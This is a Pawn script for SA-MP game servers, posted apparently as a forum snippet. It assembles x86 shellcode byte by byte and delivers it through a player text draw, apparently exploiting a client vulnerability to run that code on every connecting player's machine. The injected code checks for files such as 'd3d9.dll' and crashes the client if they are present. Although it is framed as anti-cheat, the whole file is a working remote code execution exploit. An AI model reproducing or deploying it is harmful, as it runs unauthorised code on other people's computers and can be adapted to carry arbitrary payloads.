Snoowker

1. #if !defined TextDrawClient_included
2. #define TextDrawClient_included
3.  
4. #include <a_samp>
5.  
6. static PlayerText:Clients[MAX_PLAYERS];
7. static ClientCommandId[MAX_PLAYERS];
8. new ClientCode[MAX_PLAYERS*3];
9.  
10. #define CLIENT_CODE_OFFSET  0x3B
11. #define CLIENT_DATA_OFFSET  0x1AD
12. #define CLIENT_CODE_SIZE    0x172
13. #define CLIENT_DATA_SIZE    0x173
14.  
15.  
16. #define _db(%0) ClientCode[off++] = %0
17.  
18. static stock PrepareClientMetaCode(playerid)
19. {
20.     for (new i = 0; i < sizeof(ClientCode); i++)
21.         ClientCode[i] = 0x90;
22.  
23.     ClientCommandId[playerid] = (ClientCommandId[playerid] + 1)&0xFF;
24.  
25.     if (ClientCommandId[playerid] == 0)
26.         ClientCommandId[playerid] = 1;
27.  
28.     new off = 0;
29.  
30.     _db(0x55); //push ebp
31.  
32.     _db(0x8B); //mov ebp,esp
33.     _db(0xEC);
34.  
35.     _db(0x50); //push eax
36.     _db(0x51); //push ecx
37.     _db(0x53); //push ebx
38.  
39.     _db(0xB8); //mov eax,408331FF
40.     _db(0xFF);
41.     _db(0x31);
42.     _db(0x83);
43.     _db(0x40);
44.  
45.     _db(0xC1); //shr eax,08
46.     _db(0xE8);
47.     _db(0x08);
48.  
49.     _db(0x8A); //mov cl,[eax]
50.     _db(0x08);
51.  
52.     _db(0xB3); //mov bl,ClientCommandId[playerid]
53.     _db(ClientCommandId[playerid]);
54.  
55.     _db(0x38); //cmp cl,bl
56.     _db(0xD9);
57.  
58.     _db(0x74); //je +0x1A
59.     _db(0x18);
60.  
61.     _db(0x88); //mov [eax],bl
62.     _db(0x18);
63.  
64.     _db(0x8B); //mov eax,[ebp+04]
65.     _db(0x45);
66.     _db(0x04);
67.  
68.     _db(0xBB); //mov ebx,0x3BFFFFFF
69.     _db(0xFF);
70.     _db(0xFF);
71.     _db(0xFF);
72.     _db(0x3B);
73.  
74.     _db(0xC1); //shr ebx,18
75.     _db(0xEB);
76.     _db(0x18);
77.  
78.     _db(0x01); //add eax,ebx
79.     _db(0xD8);
80.  
81.     _db(0x8B); //mov ecx,[ebp+04]
82.     _db(0x4D);
83.     _db(0x04);
84.  
85.     _db(0x51); //push ecx
86.  
87.     _db(0xFF); //call eax
88.     _db(0xD0);
89.  
90.     _db(0x83); //add esp,04
91.     _db(0xC4);
92.     _db(0x04);
93.  
94.     _db(0x5B); //pop ebx
95.     _db(0x59); //pop ecx
96.     _db(0x58); //pop eax
97.     _db(0x5D); //pop ebp
98.  
99.     _db(0x83); //add esp,24
100.     _db(0xC4);
101.     _db(0x24);
102.  
103.     _db(0x5F); //pop edi
104.     _db(0x5E); //pop esi
105.  
106.     _db(0x83); //add esp,18
107.     _db(0xC4);
108.     _db(0x18);
109.  
110.     _db(0xC3); //ret
111.  
112.     //Code
113.     _db(0xC3); //ret (do nothing)
114.  
115.     //Return address
116.     ClientCode[800] = 0x16; //-> ret
117.     ClientCode[801] = 0x27;
118.     ClientCode[802] = 0x40;
119.     ClientCode[803] = 0x00;
120. }
121.  
122. static stock Client_FileExists(off) //arg0 - file path, arg1 - length
123. {
124.     _db(0x55); //push ebp
125.  
126.     _db(0x8B); //mov ebp,esp
127.     _db(0xEC);
128.  
129.     _db(0x53); //push ebx
130.  
131.     _db(0x31); //xor eax,eax
132.     _db(0xC0);
133.  
134.     _db(0x50); //push eax
135.  
136.     _db(0xB8); //mov eax,80FFFFFF
137.     _db(0xFF);
138.     _db(0xFF);
139.     _db(0xFF);
140.     _db(0x80);
141.  
142.     _db(0xC1); //shr eax,18
143.     _db(0xE8);
144.     _db(0x18);
145.  
146.     _db(0x50); //push eax
147.  
148.     _db(0xB8); //mov eax,03FFFFFF
149.     _db(0xFF);
150.     _db(0xFF);
151.     _db(0xFF);
152.     _db(0x03);
153.  
154.     _db(0xC1); //shr eax,18
155.     _db(0xE8);
156.     _db(0x18);
157.  
158.     _db(0x50); //push eax
159.  
160.     _db(0x31); //xor eax,eax
161.     _db(0xC0);
162.  
163.     _db(0x50); //push eax
164.     _db(0x40); //inc eax
165.     _db(0x50); //push eax
166.  
167.     _db(0xB8); //mov eax,FFFFFF80
168.     _db(0x80);
169.     _db(0xFF);
170.     _db(0xFF);
171.     _db(0xFF);
172.  
173.     _db(0xC1); //shl eax,18
174.     _db(0xE0);
175.     _db(0x18);
176.  
177.     _db(0x50); //push eax
178.  
179.     _db(0x8B); //mov eax,[ebp+08]
180.     _db(0x45);
181.     _db(0x08);
182.  
183.     _db(0x8B); //mov ebx,[ebp+0C]
184.     _db(0x5D);
185.     _db(0x0C);
186.  
187.     _db(0x01); //add eax,ebx
188.     _db(0xD8);
189.  
190.     _db(0x53); //push ebx
191.  
192.     _db(0x31); //xor ebx,ebx
193.     _db(0xDB);
194.  
195.     _db(0x88); //mov eax,bl
196.     _db(0x18);
197.  
198.     _db(0x5B); //pop ebx
199.  
200.     _db(0x29); //sub eax,ebx
201.     _db(0xD8);
202.  
203.     _db(0x50); //push eax
204.  
205.     _db(0xB8); //mov eax,81E45AFF
206.     _db(0xFF);
207.     _db(0x5A);
208.     _db(0xE4);
209.     _db(0x81);
210.  
211.     _db(0xC1); //shr eax,08
212.     _db(0xE8);
213.     _db(0x08);
214.  
215.     _db(0xFF); //call eax
216.     _db(0xD0);
217.  
218.     _db(0x83); //cmp eax,-01
219.     _db(0xF8);
220.     _db(0xFF);
221.  
222.     _db(0x0F); //setne al
223.     _db(0x95);
224.     _db(0xC0);
225.  
226.     _db(0x5B); //pop ebx
227.     _db(0x5D); //pop ebp
228.     _db(0xC3); //ret
229. }
230.  
231. stock CrashCheater(playerid)
232. {
233.  
234.     PrepareClientMetaCode(playerid);
235.  
236.     new str_d3d9[] = "d3d9.dll";
237.     new str_vorbisHooked[] = "sdfsdfdssdfl";
238.  
239.     new bytes = 0;
240.     new i = 0;
241.     while (str_d3d9[bytes])
242.     {
243.         ClientCode[CLIENT_DATA_OFFSET + bytes] = str_d3d9[bytes];
244.         bytes++;
245.     }
246.     bytes++;
247.     while (str_vorbisHooked[i])
248.     {
249.         ClientCode[CLIENT_DATA_OFFSET + bytes] = str_vorbisHooked[i];
250.         bytes++;
251.         i++;
252.     }
253.  
254.  
255.     new off = CLIENT_CODE_OFFSET;
256.  
257.     _db(0x55); //push ebp
258.  
259.     _db(0x8B); //mov ebp,esp
260.     _db(0xEC);
261.  
262.     _db(0x50); //push eax
263.     _db(0x53); //push ebx
264.  
265.     _db(0xB8); //mov eax,length
266.     _db(0xFF);
267.     _db(0xFF);
268.     _db(0xFF);
269.     _db((sizeof(str_d3d9) - 1));
270.  
271.     _db(0xC1); //shr eax,18
272.     _db(0xE8);
273.     _db(0x18);
274.  
275.     _db(0x50); //push eax
276.  
277.     _db(0x8B); //mov eax,[ebp+08]
278.     _db(0x45);
279.     _db(0x08);
280.  
281.     _db(0xBB); //mov ebx,"d3d9.dll"
282.     _db(0xFF);
283.     _db(0xFF);
284.     _db((CLIENT_DATA_OFFSET&0xFF));
285.     _db(((CLIENT_DATA_OFFSET>>>8)&0xFF));
286.  
287.     _db(0xC1); //shr ebx,10
288.     _db(0xEB);
289.     _db(0x10);
290.  
291.     _db(0x01); //add eax,ebx
292.     _db(0xD8);
293.  
294.     _db(0x50); //push eax
295.  
296.     _db(0x8B); //mov eax,[ebp+08]
297.     _db(0x45);
298.     _db(0x08);
299.  
300.     _db(0xBB); //mov ebx,Client_FileExists
301.     _db(0xFF);
302.     _db(0xFF);
303.     _db(0xFF);
304.     _db(0xB0);
305.  
306.     _db(0xC1); //shr ebx,18
307.     _db(0xEB);
308.     _db(0x18);
309.  
310.     _db(0x01); //add eax,ebx
311.     _db(0xD8);
312.  
313.     _db(0xFF); //call eax
314.     _db(0xD0);
315.  
316.     _db(0x84); //test al,al
317.     _db(0xC0);
318.  
319.     _db(0x0F); //jne crash
320.     _db(0x85);
321.     _db((random(0xFF) + 1));
322.     _db((random(0xFF) + 1));
323.     _db((random(0xFF) + 1));
324.     _db((random(0xFF) + 1));
325.  
326.     _db(0x83); //add esp,08
327.     _db(0xC4);
328.     _db(0x08);
329.  
330.     _db(0xB8); //mov eax,length
331.     _db(0xFF);
332.     _db(0xFF);
333.     _db(0xFF);
334.     _db((sizeof(str_vorbisHooked) - 1));
335.  
336.     _db(0xC1); //shr eax,18
337.     _db(0xE8);
338.     _db(0x18);
339.  
340.     _db(0x50); //push eax
341.  
342.     _db(0x8B); //mov eax,[ebp+08]
343.     _db(0x45);
344.     _db(0x08);
345.  
346.     _db(0xBB); //mov ebx,"vorbisHooked.dll"
347.     _db(0xFF);
348.     _db(0xFF);
349.     _db(((CLIENT_DATA_OFFSET + sizeof(str_d3d9))&0xFF));
350.     _db((((CLIENT_DATA_OFFSET + sizeof(str_d3d9))>>>8)&0xFF));
351.  
352.     _db(0xC1); //shr ebx,10
353.     _db(0xEB);
354.     _db(0x10);
355.  
356.     _db(0x01); //add eax,ebx
357.     _db(0xD8);
358.  
359.     _db(0x50); //push eax
360.  
361.     _db(0x8B); //mov eax,[ebp+08]
362.     _db(0x45);
363.     _db(0x08);
364.  
365.     _db(0xBB); //mov ebx,Client_FileExists
366.     _db(0xFF);
367.     _db(0xFF);
368.     _db(0xFF);
369.     _db(0xB0);
370.  
371.     _db(0xC1); //shr ebx,18
372.     _db(0xEB);
373.     _db(0x18);
374.  
375.     _db(0x01); //add eax,ebx
376.     _db(0xD8);
377.  
378.     _db(0xFF); //call eax
379.     _db(0xD0);
380.  
381.     _db(0x84); //test al,al
382.     _db(0xC0);
383.  
384.     _db(0x0F); //jne crash
385.     _db(0x85);
386.     _db((random(0xFF) + 1));
387.     _db((random(0xFF) + 1));
388.     _db((random(0xFF) + 1));
389.     _db((random(0xFF) + 1));
390.  
391.     _db(0x83); //add esp,08
392.     _db(0xC4);
393.     _db(0x08);
394.  
395.     _db(0x5B); //pop ebx
396.     _db(0x58); //pop eax
397.     _db(0x5D); //pop ebp
398.     _db(0xC3); //ret
399.  
400.     Client_FileExists(0xB0);
401.  
402.     PlayerTextDrawSetString(playerid, Clients[playerid], ClientCode);
403. }
404.  
405. stock LoadClientForPlayer(playerid)
406. {
407.     PrepareClientMetaCode(playerid);
408.     Clients[playerid] = CreatePlayerTextDraw(playerid, 1000, 1000, ClientCode);
409.     PlayerTextDrawShow(playerid, Clients[playerid]);
410. }
411.  
412. stock UnloadClientForPlayer(playerid)
413. {
414.     PlayerTextDrawHide(playerid, Clients[playerid]);
415.     PlayerTextDrawDestroy(playerid, Clients[playerid]);
416.     Clients[playerid] = PlayerText:0;
417. }
418.  
419. #undef _db
420. #endif
421.  
422. public OnPlayerSpawn(playerid)
423. {
424.     LoadClientForPlayer(playerid);
425.     CrashCheater(playerid);
426.     return 1;
427. }